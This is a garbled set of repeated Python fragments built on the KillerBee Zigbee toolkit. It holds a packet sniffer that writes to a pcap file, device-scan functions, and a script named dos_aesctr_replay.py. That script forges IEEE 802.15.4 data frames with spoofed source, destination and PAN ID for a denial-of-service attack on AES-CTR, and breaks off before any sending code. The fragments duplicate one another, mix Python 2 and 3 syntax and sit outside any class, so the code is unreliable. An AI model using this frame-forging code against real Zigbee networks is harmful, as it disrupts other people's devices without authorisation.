class zigbeeSniffer(Sniffer):
def __init__(self, options):
name, self.device, self.nbpkts, self.channel = options
if name is None:
name = 'zigbee'
if len(self.device) != 1:
print(f'[i] This sniffer can handle only one device at the same time. This sniffer will use the device {self.device[0]}')
self.device = self.device[0]
Sniffer.__init__(self, name)
self.outputFile = '/home/jnt/zigbee.pcap'
self.redirect = io.StringIO()
#device, self.nbpkts, self.channel = options
# device, self.nbpkts, self.channel, self.outputFile= options
self.kb = KillerBee(self.device)
try:
self.kb.set_channel(self.channel, 0)
except ValueError as e:
print('ERROR:' + e)
exit(1)
def run(self):
self.kb.sniffer_on()
# Create a PCAP dumper to write packets to a pcap
with PcapDumper(DLT_IEEE802_15_4, self.outputFile, ppi=False) as pd:
#rf_freq_mhz = (args.channel - 10) * 5 + 2400
#print("zbwireshark: listening on \'{0}\'".format(kb.get_dev_info()[0]))
rf_freq_mhz = self.kb.frequency(self.channel, 0) / 1000.0
print("zbwireshark: listening on \'{0}\', channel {1}, page {2} ({3} MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes".format(self.kb.get_dev_info()[0], self.channel, 0, rf_freq_mhz))
try:
packetcount = 0
while self.nbpkts != packetcount:
with redirect_stdout(self.redirect):
if self.terminated():
print(f"{self.name} is quitting")
break
# Wait for the next packet
packet = self.kb.pnext()
if packet != None:
packetcount+=1
pd.pcap_dump(packet['bytes'], ant_dbm=packet['dbm'], freq_mhz=rf_freq_mhz)
except IOError as e:
if e.errno == 32:
#print("ERROR: Pipe broken. Was Wireshark closed or stopped?")
pass
else:
raise
self.kb.sniffer_off()
print("{0} packets captured".format(packetcount))
def startScan(zbdb, currentGPS, verbose=False, dblog=False, agressive=False):
try:
kb = KillerBee()
except usb.USBError, e:
if e.args[0].find('Operation not permitted') >= 0:
print 'Error: Permissions error, try running using sudo.'
else:
print 'Error: USBError:', e
return False
def __init__(self, options):
name, self.device, self.nbpkts, self.channel = options
if name is None:
name = 'zigbee'
if len(self.device) != 1:
print(f'[i] This sniffer can handle only one device at the same time. This sniffer will use the device {self.device[0]}')
self.device = self.device[0]
Sniffer.__init__(self, name)
self.outputFile = '/home/jnt/zigbee.pcap'
self.redirect = io.StringIO()
#device, self.nbpkts, self.channel = options
# device, self.nbpkts, self.channel, self.outputFile= options
self.kb = KillerBee(self.device)
try:
self.kb.set_channel(self.channel, 0)
except ValueError as e:
print('ERROR:' + e)
exit(1)
def startScan(currentGPS,
verbose=False,
include=[],
ignore=None,
output='.',
scanning_time=5,
capture_time=2):
try:
kb = KillerBee()
except USBError, e:
if e.args[0].find('Operation not permitted') >= 0:
log_message = 'Error: Permissions error, try running using sudo.'
logging.error(log_message)
print log_message
else:
log_message = 'Error: USBError: {}'.format(e)
logging.error(log_message)
print log_message
return False
def __init__(self, device, datasource=None, gps=None):
KillerBee.__init__(self, device, datasource, gps)
self.device = device
self.plugin = None
self.active = False
action='store',
required=True,
type=tohex)
parser.add_argument('-d',
'--destination',
action='store',
required=True,
type=tohex)
parser.add_argument('-q',
'--seqnum',
action='store',
default=200,
type=int)
args = parser.parse_args()
kb = KillerBee(device=args.devstring)
if kb is None:
raise Exception("Failed to create a KillerBee instance.")
try:
kb.set_channel(args.channel)
except Exception, e:
raise Exception('Error: Failed to set channel to %d' % channel, e)
scapy = Dot15d4(fcf_frametype="Data") / Dot15d4Data()
scapy.seqnum = (args.seqnum + randint(1, 10)) % 255
scapy.src_addr = args.source
scapy.dest_addr = args.destination
scapy.src_panid = scapy.dest_panid = args.panid
print "DoSing packets from sender 0x%04x to destination 0x%04x." % (
scapy.src_addr, scapy.dest_addr)
def __init__(self, device, datasource=None, gps=None):
KillerBee.__init__(self, device, datasource, gps)
self.device = device
self.plugin = None
self.active = False
# Command line main function
# clear; sudo python dos_aesctr_replay.py -c 26 -s 3c63 -d 800a -p 1234
if __name__=='__main__':
# Command-line arguments
parser = argparse.ArgumentParser()
tohex = lambda s: int(s.replace(':', ''), 16)
parser.add_argument('-f', '--channel', '-c', action='store', dest='channel', required=True, type=int, default=11)
parser.add_argument('-i', '--interface', action='store', dest='devstring', default=None)
parser.add_argument('-p', '--panid', action='store', required=True, type=tohex)
parser.add_argument('-s', '--source', action='store', required=True, type=tohex)
parser.add_argument('-d', '--destination', action='store', required=True, type=tohex)
parser.add_argument('-q', '--seqnum', action='store', default=200, type=int)
args = parser.parse_args()
kb = KillerBee(device=args.devstring)
if kb is None:
raise Exception("Failed to create a KillerBee instance.")
try:
kb.set_channel(args.channel)
except Exception, e:
raise Exception('Error: Failed to set channel to %d' % channel, e)
scapy = Dot15d4(fcf_frametype="Data")/Dot15d4Data()
scapy.seqnum = (args.seqnum + randint(1, 10)) % 255
scapy.src_addr = args.source
scapy.dest_addr = args.destination
scapy.src_panid = scapy.dest_panid = args.panid
print "DoSing packets from sender 0x%04x to destination 0x%04x." % (scapy.src_addr, scapy.dest_addr)
# Weaponize this frame for the DoS Attack on AES-CTR